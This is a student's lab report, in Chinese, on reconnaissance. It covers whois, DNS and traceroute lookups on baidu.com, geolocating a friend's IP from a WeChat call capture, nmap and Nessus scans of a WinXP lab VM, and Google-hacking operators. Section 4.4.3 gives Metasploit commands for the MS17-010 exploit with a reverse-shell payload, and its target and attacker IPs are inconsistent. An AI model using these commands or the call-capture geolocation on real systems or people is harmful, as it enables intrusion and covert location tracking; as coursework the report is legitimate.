20232409 2025-2026-1 《网络与系统攻防技术》实验五实验报告

信息搜集技术实践

1.实验内容

    1.1域名与IP信息搜集分析;

    1.2社交网络IP地址获取与地理位置定位;

    1.3靶机环境扫描探测、漏洞评估与攻击路径分析;

    1.4搜索个人网上足迹与高级搜索技能实践。

 

2.实验目的

    学习使用搜索引擎、扫描引擎、扫描工具分析目标状态。实现对目标信息的全面了解。

 

3.实验环境

    安装Kali镜像以及安装WinXP镜像的2台VMware虚拟机,具体配置如图1、2所示: 

image
1,实验环境Kali虚拟机
image 
2,实验环境WinXP虚拟机

 

4.实验过程与分析

    4.1 对baidu.com进行DNS域名查询,获取信息

    4.1.1 查询DNS注册人及联系方式

    在kali虚拟机中使用命令whois baidu.com,查询该域名的注册信息。如图3、4所示:

(图3,查询域名注册信息一)
(图4,查询域名注册信息二)

    从返回数据中可以了解到注册人信息,注册商信息,联系方式等信息,具体信息如下:

    注册人组织:北京百度网讯科技有限公司

    注册人国家:中国

    注册域名ID:11181110_DOMAIN_COM-VRSN

    注册商:MarkMonitor Information Technology (Shanghai) Co., Ltd.

    注册商IANA ID:3838

    注册机构:MarkMonitor Inc.

    注册商滥用投诉电话:+1.2083895740

    注册商滥用投诉邮箱:abusecomplaints@markmonitor.com

    4.1.2 查询对应域名的IP地址

    使用命令dig baidu.com查询DNS解析信息,包括IP地址、服务器配置等信息。从返回数据可以,39.156.70.37和220.181.7.203是百度的两个IP地址。且为实现负载均衡,百度配置了多个地址记录,使得用户访问时会分配到不同的服务器IP。如图5所示:

(图5,使用dig命令查询IP地址)

    使用命令nslookup baidu.com查询域名的DNS信息,对上述信息进行验证。在本地DNS服务器的缓存解析到了39.156.70.37和220.181.7.203两个IP地址,验证了百度使用的多IP负载均衡策略。如图6所示:

(图6,使用nslookup命令验证IP地址)

    4.1.3 查询IP地址注册信息

    使用whois命令,可以得到IP地址的注册人和他的邮箱、电话,以及IP地址的地址信息。

    对于IP地址39.156.70.37,可以从返回数据中了解到如下信息,如图7-10所示:

    IP地址归属信息

    IP地址段: 39.128.0.0-39.191.255.255

    网络名称: CMNET

    所属机构: China Mobile Communications Corporation (中国移动通信集团公司)

(图7,39.156.70.37的归属信息)

    注册人/组织信息

    组织名称: China Mobile (中国移动)

    国家: CN (中国)

    地址: 北京市西城区金融大街29号

    电话: +86-10-5268-6688

    传真: +86-10-5261-6187

(图8,39.156.70.37的注册信息)

    技术联系人信息

    技术联系人: haijun li

    联系人邮箱: hostmaster@chinamobile.com

    联系人电话: +86 1052686688

    联系人传真: +86 10 52616187

(图9,39.156.70.37的技术联系人信息)

    网络状态信息

    状态: ALLOCATED PORTABLE (已分配可移植)

    最后修改时间: 2020-10-20T00:58:36Z

    数据来源: APNIC (亚太互联网络信息中心)

(图10,39.156.70.37的网络状态信息)

    对于IP地址220.181.7.203,可以从返回数据中了解到如下信息,如图11-15所示:

    IP地址归属信息

    IP地址段: 220.181.0.0-220.181.255.255

    网络名称: CHINANET-IDC-BJ

    所属机构: China Telecom (中国电信)

(图11,220.181.7.203的归属信息)

    注册人/组织信息

    组织名称: China Telecom (中国电信)

    网络描述: CHINANET Beijing province network (中国电信北京省网络)

    国家: CN (中国)

    地址: 北京市金融大街31号

(图12,220.181.7.203的注册信息)

    管理联系人信息

    联系人: Chinanet Hostmaster

    邮箱: anti-spam@chinatelecom.cn

    电话: +86-10-58501724

    传真: +86-10-58501724

    地址: 北京市金融大街31号

(图13,220.181.7.203的管理联系人信息)

    技术联系人信息

    联系人: Hostmaster of Beijing Telecom corporation CHINA TELECOM

    邮箱: bjnic@bjtelecom.net

    电话: +86-010-58503461

    传真: +86-010-58503054

    地址: 北京市西城区西单北大街107号

(图14,220.181.7.203的技术联系人信息)

    网络状态信息

    状态: ALLOCATED NON-PORTABLE (已分配不可移植)

    最后修改时间: 2008-09-04T06:56:04Z

    数据来源: APNIC (亚太互联网络信息中心)

(图15,220.181.7.203的网络状态信息)

    4.1.4 跟踪网络路由

    通过traceroute baidu.com命令,可以追踪到数据包从本机到目标主机所经过的路径。

    对于到达IP为39.156.70.37时,共需要14跳,其中1-4跳在本地网络中(使用的是内网地址);5-9跳大概率在运营商网络,其中7-9跳未能显示,可能是防火墙阻止了ICMP响应;10-14跳在百度网络中(根据先前数据可知该段IP属于中国移动的IP)。如图16所示:

(图16,39.156.70.373的路由信息)

    对于到达IP为220.181.7.203时,共需要13跳,其中1-4跳在本地网络中,5-6在运营商网络,7-13跳在百度网络中。该路径整体延迟更稳定,路径更短。如图17所示:

(图17,220.181.7.203的路由信息)

    4.1.5 获取IP地址注册位置

    使用“UU在线工具”查询IP地址的具体位置,网址为:https://uutool.cn/ip/。对于IP 39.156.70.37和220.181.7.203,它们的城市级位置如图18、19所示。由于这两个IP地址属于中风险地址,所以若要查询区县级或街道级位置需开通会员。

(图18,39.156.70.373的位置信息)
(图19,220.181.7.203的位置信息)

    4.1.6 总结

    DNS对应的相关信息:

信息项

信息值

DNS注册组织

北京百度网讯科技有限公司

DNS注册机构

MarkMonitor Inc.

DNS注册人

联系方式

电话

+1.2083895740

邮箱

abusecomplaints@markmonitor.com

    IP地址对应的相关信息:

信息项

信息值

IP地址

39.156.70.37

220.181.7.203

IP地址注册人

中国移动通信集团公司

中国电信集团公司

IP注册人

联系方式

电话

+86-10-5268-6688

+86-010-58503461

邮箱

hostmaster@chinamobile.com

bjnic@bjtelecom.net

IP所在国家

中国

中国

IP所在城市

北京

北京

IP具体地理位置

北京市西城区金融大街29号

北京市西城区金融大街31号

    4.2 尝试获取一位好友的IP地址与具体地理位置

    4.2.1 获取IP地址

    给某一微信好友打语音电话并开启wireshark抓包,使用命令udp and ip.addr==192.168.3.13筛选IP为主机地址,并且传输协议为UDP的数据包。筛选结果如图20所示:

(图20,抓包结果信息)

    从中可以看出,源/目的IP除本机IP之外,主要是两个,一个是115.205.196.91,另一个是116.163.10.153。

    4.2.2 查询地理位置

    分别查找两个IP的具体所在地,如图21、22所示:

(图21,115.205.196.91所在地)
(图22,116.163.10.153所在地)

    从上述数据中可以确定115.205.196.91是对方的IP地址,且与对方自行提供的公网IP地址能够完全对应,如图23所示。查询对方的地理位置,虽不能完全精准的对应,但是大致方位是正确的。

(图23,对方自查IP地址)

    而116.163.10.153很有可能是微信用于通话中转、信令控制或负载均衡的服务器节点。结束该语音通话后又重新进行一个新的语音通话,该IP地址发生变化,地址显示在江苏。因此可以确定它大概率是中转服务器的IP地址。

    4.3 使用nmap开源软件对靶机环境进行扫描

    此处使用WinXP虚拟机作为靶机,Kali虚拟机作为攻击机。配置该靶机可以参考教程:https://blog.csdn.net/weixin_52799373/article/details/144051549

    安装完成后,分别查看靶机与攻击机的IP地址,其中靶机IP地址为192.168.3.42,攻击机的IP地址为192.168.3.43。如图24、25所示:

(图24,靶机IP地址)
(图25,攻击机IP地址)

    4.3.1 检查靶机IP地址是否活跃

    通过命令nmap -sn 192.168.3.42进行ping扫描,查询靶机是否在线。查询结果为靶机在线,如图26所示:

(图26,ping扫描主机发现)

    4.3.2 检查靶机IP地址开放的端口

    通过命令nmap -sS 192.168.3.42进行SYN扫描,查询靶机开放的TCP端口。查询结果为靶机开放的TCP端口有135、139、445端口。其中135端口提供Microsoft RPC服务,139端口提供NetBIOS会话服务,445端口提供Microsoft目录服务。如图27所示:

(图27,SYN扫描)

    通过命令nmap -sU 192.168.3.42进行UDP扫描,查询靶机开放的UDP端口。查询结果为靶机开放的UDP端口有123、137端口。开放但被过滤的端口有138、445、500、1048、1900、4500端口。其中123端口是网络时间协议,137端口是NetBIOS名称服务。如图28所示:

(图28,UDP扫描主机)

    4.3.3靶机安装的操作系统及版本

    通过命令nmap -O 192.168.3.42,查询靶机安装的操作系统及版本。查询结果为靶机开放的操作系统是Microsoft Windows XP。具体版本可能是Windows XP SP2/SP3或Windows 2000 SP4,因为它是通过Nmap的指纹数据库匹配的,所以无法完全确定。如图29所示:

(图29,操作系统扫描)

    4.3.4靶机安装的服务

    通过命令nmap -sV 192.168.3.42,查询靶机安装的服务。查询结果为靶机安装的服务是远程过程调用服务和文件打印机共享服务。通过135端口,可以支持程序间的网络通信。通过139端口和445端口可以在局域网内共享文件和打印机,让其他计算机访问它的资源。如图30所示:

(图30,UDP扫描主机)

    4.4 用Nessus开源软件对靶机环境进行扫描

    4.4.1靶机上开放的端口

    在Kali虚拟机上下载nessus,下载教程参考网址:https://blog.csdn.net/weixin_48886225/article/details/140269127。

    安装完成后,通过https://localhost:8834打开nessus,选择create new scan,选择其中的host discovery。在扫描配置界面,输入任务名称、描述、文件夹与目标主机。前三个可以任意填写,随后一个需填写靶机的IP地址。如图31所示:

(图31,扫描配置界面配置)

    保存并扫描,扫描结果显示,靶机开放的端口有135、139、445端口,与使用nmap扫描的结果相同。如图32所示:

(图32,扫描结果一)

    4.4.2靶机各个端口上网络服务存在的安全漏洞

    创建一个新的扫描,选择Advanced Scan高级扫描,并使用同样的方式进行配置,并进行扫描。扫描结果如图33所示:

(图33,扫描结果二)
    扫描结果显示,靶机主要存在的漏洞是SMB协议的漏洞。按照漏洞的严重程度分类,靶机存在以下五种漏洞:
    (1)严重漏洞
    漏洞名称:MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687)
    风险:Windows系统SMB协议的远程代码执行漏洞,允许攻击者无需身份验证即可在目标系统上执行任意代码。攻击者可通过发送特制SMB请求包获取系统控制权,可能导致数据泄露、系统被控或植入恶意软件。
    (2)高危漏洞
    漏洞名称:SMB NULL Session Authentication
    风险:SMB协议的空会话认证漏洞,允许攻击者建立匿名连接,获取敏感信息。攻击者可枚举系统信息,为后续渗透提供基础。
    (3)中危漏洞
    漏洞名称:SMB Multiple Issues
    风险:SMB协议存在多个混合型问题。可被用于扩大攻击面。
    (4)低危漏洞
    漏洞名称:ICMP Timestamp Request Remote Date Disclosure
    风险:ICMP时间戳请求导致系统日期泄露。攻击者可获取系统时间信息,辅助侦察。
    (5)信息性漏洞
    包括SMB配置披露、NTP服务检测、TCP/IP时间戳支持等,虽无直接安全威胁,但可能暴露系统配置信息。

    4.4.3攻陷靶机环境,获得系统访问权的方法

    使用编号为MS17-010的永恒之蓝漏洞,它主要利用了SMB协议,影响的是TCP 139和445端口。具体命令如下,如图34所示:
msf > use exploit/windows/smb/ms17_010_psexec #利用永恒之蓝漏洞的模块
set RHOSTS 192.168.3.43 #目标IP
set LHOST 192.168.3.41 #攻击机IP,用于回连
set PAYLOAD windows/meterpreter/reverse_tcp #指定后门程序
exploit #开始

  

(图34,攻击命令)

    从返回值“[+] 192.168.3.43:445 - Overwrite complete... SYSTEM session obtained!”中可以看出,永恒之蓝漏洞已经被利用,可以在目标系统上执行意代码,并且获得最高权限(system)。

    从返回值“[-] 192.168.3.43:445 - Service failed to start, ERROR_CODE: 193”,看出启动失败,失败原因是该文件不是有效的Win32应用程序。

    这是因为winXP,一个32位系统,攻击模块默认生成的Payload是一个64位的程序,因此不匹配而导致错误使得没能够建立控制会话。如图35所示:

(图35,攻击结果)

    尝试构建32位的Payload,似乎系统不支持。如图36所示:

(图36,payload构建失败)

    因此此次攻击虽然成功利用了漏洞,但是由于无法构建符合靶机的载荷,使得最终没有获得目标系统的访问权。

    4.5 搜索测试

    4.5.1 搜索自己在网上的足迹

    搜索自己的名字,发现诸多信息能够被搜到。同时AI还利用这些搜索结果整理了我求学期间的经历与参加的活动。我认为其中的一个原因可能是我的名字重名率极低。如图37所示: 

image

(图37,搜索自己的名字)

    搜索自己的学号,发现博客园中的博客若干,没有其他信息。如图38所示:

image 

(图38,搜索自己的学号)

    搜索自己的手机号虽无其他敏感信息,但能够判断出我手机号所在的位置。如图39所示: 

image

(图39,搜索自己的手机号)

    搜索自己的身份证号,无任何信息。

    综上,对于姓名信息,主要能够搜索到的是姓名、求学经历与活动记录,它们多为公开信息,虽可被汇总,但通常不涉及敏感内容。对于学号信息,主要出现在博客园等技术博客平台,不会造成严重后果。对于手机号信息,虽可被推断出所在城市或地区信息,但未涉及通话、短信内容,无直接敏感内容泄露。对于身份证号信息未检索到任何相关信息。

    因此,我的信息主要集中在姓名和活动经历,未涉及财产、健康、行踪等高敏信息。虽在一定程度上有信息泄露,但无隐私泄露问题。

    4.5.2 练习使用Google hack搜集技能完成搜索

    (1)site:指定域名

    仅搜索指定网站或域名的资源。

    示例:site:baidu.com python教程。可用于搜索百度旗下页面中含“python教程”的内容。

image 

(图40,使用site:指定域名)

    (2)info:指定域名

    查询网站的基础信息,如缓存时间、收录状态等。

    示例:info:google.com。可用于展示谷歌官网的基本索引信息。

image 

(图41,使用info:指定域名)

    (3)intext:限定关键字

    限定关键字必须出现在网页正文内容中。

    示例:intext:数据安全 隐私保护。可用于找到正文中同时包含“数据安全”和“隐私保护”的页面。 

image

(图42,使用intext:限定关键词)

    (4)intitle:匹配关键字

    只匹配网页标题中含关键字的页面。

    示例:intitle:2025 AI趋势报告。可用于筛选标题含该关键词的报告类页面。 

image

(图43,使用intitle:匹配关键词)

    (5)allintitle:查找标题中同时包含多个关键词的页面

    比 intitle:更严格,要求网页标题中必须同时出现所有指定的关键字。

    示例:allintitle:上海 美食 攻略。可用于查找标题中完整包含这三个词的旅游指南页面,并且过滤掉只包含其中一两个词的无关结果。

image 

(图44,使用allintitle:匹配关键词)

    (6)inurl:匹配关键字

    筛选URL地址中含关键字的网页。

    示例:inurl:admin 登录。可用于定位URL含“admin”且含“登录”的页面。

image 

(图45,使用inurl:匹配关键词)

    (7)filetype:匹配文件类型

    限定搜索指定文件格式的资源。

    示例:filetype:pdf 机器学习入门。可以找到PDF格式的机器学习资料。

image

 

(图46,使用filetype: 匹配文件类型)

    (8)ext:限定搜索特定类型的网页扩展名

    与filetype:作用类似,但它侧重于URL中显示的文件扩展名。

    示例:ext:ppt 项目管理 方法论。可用于查找扩展名为 .ppt 的PowerPoint演示文稿。 

image

(图47,使用 ext: 限定搜索特定类型的网页扩展名)

    (9)OR用于扩大搜索范围

     搜索包含多个关键词中任意一个的页面。

     示例:新能源汽车(政策 OR 补贴)2024。可用于查找与新能源汽车政策和补贴相关的2024年信息。 

image

(图48,使用OR:用于扩大搜索范围)

    (10)*通配符匹配任何未知词

    在词组中代替一个或多个未知词。

    示例:*是*的首都。可用于找到各种国家的首都信息。 

image

(图49,*匹配任何未知词)

 

 

5.问题及解决

    问题一:在使用nmap对靶机进行扫描时,没有得到任何结果。

    解决一:查看靶机上的防火墙使用情况,发现防火墙未关闭。将其关闭后可以正常扫描。查看与关闭防火墙如图50所示 

image

(图50,查看关闭防火墙)

    问题二:安装nessus时,提示“Nessus has no plugins. Therefore, functionality is limited.”重复安装了很多遍也没有用。

    解决二:查看安装插件的压缩包,发现为0字节,说明下载时不知为何没有下载成功。需重新下载压缩包。重新下载时需使用命令/opt/nessus/sbin/nessuscli fetch --deactivate将主机与许可证解绑才可重新下载,否则会提示License already in use错误。当提示“Plugins are compiling. Nessus functionality will be limited until compilation is complete.”时说明插件安装成功。

 

    问题三:使用google hack搜索时,部分指令没有达到预期效果。比如减号指令,若搜索“留学 -英国”,应出现除英国之外的留学信息,结果出现的全是英国留学信息。如图51所示:

image 

(图51,360高级搜索出错)

    解决三:原先我是用的是360搜索,它可能不完全兼容Google的减号排除语法。如果直接在Google.com上搜索可能能够成功。后续我又使用了对高级搜索语法的支持更好的搜索引擎cn.bing.com,但仍然未能得到正确结果。如图52所示:

image 

(图52,Bing高级搜索出错)

    后了解到,Bing支持NOT操作符,效果可能比减号好。于是尝试使用NOT操作符,能够搜索得到非英国的留学信息。如图53所示:

image

(图53,Bing高级搜索正确)

 

6.心得体会

    本次实验我学习了信息搜集技术,学习的内容有:对指定域名进行分析,获取IP地址以及它的注册人信息、地址信息等,通过抓包手段获取通信好友的IP地址并分析其地理位置,使用nmap与nessus探测靶机的环境、存在的安全漏洞,并尝试进行攻击,使用高级搜索方式并查看自己在网上留下的痕迹。通过一系列的实践,我对于信息搜集的方式及其成效有了一定的了解。

    实验过程中也遇到不少问题,既有环境配置与软件安装方面的困难,也有具体指令执行时的困惑。在搭建实验环境时,由于未能直接获取官方资源,我在下载WinXP镜像时耗费了大量时间,尝试了多个渠道,走了不少弯路,最终才成功完成虚拟机的安装。而在配置nessus时,由于参考的不同文章方案各异,实际操作中感到困惑重重,虽然最终也完成了配置,但整个过程耗时较长。此外,不少CSDN博客内容需要付费查看,网盘资源快速下载也常受限于会员权限,对于没有相关会员的我来说,在资料查找与资源下载上花费了较多时间。

    在具体操作环节,我也遇到了一些意料之外的情况,例如部分网站无法访问,或指令执行结果与预期不符。往届同学推荐的根据IP查询具体地理位置的网站无法打开,我只好重新寻找具有类似功能的替代网站,所幸很快找到了可用资源。而在Google Hack语法部分,我又遇到了国内常用浏览器不支持某些语法的问题,最终通过咨询AI找到了问题的原因及解决方法。

    总而言之,在本次实验中,我学习到了信息搜集的基本技术,并在实践中体会到合理运用相关方法与工具能够提升信息搜集的效率和深度,它们让我认识到这项技能的强大所在。我相信本次的实验会对我未来在网络与系统攻防技术的学习有所帮助。

 

参考资料

VMware17pro虚拟机安装Windows XP教程(超详细)

kali安装Nessus图文教程

Google Hack详细使用教程

 

posted @ 2025-11-03 16:32  20232409  阅读(17)  评论(0)    收藏  举报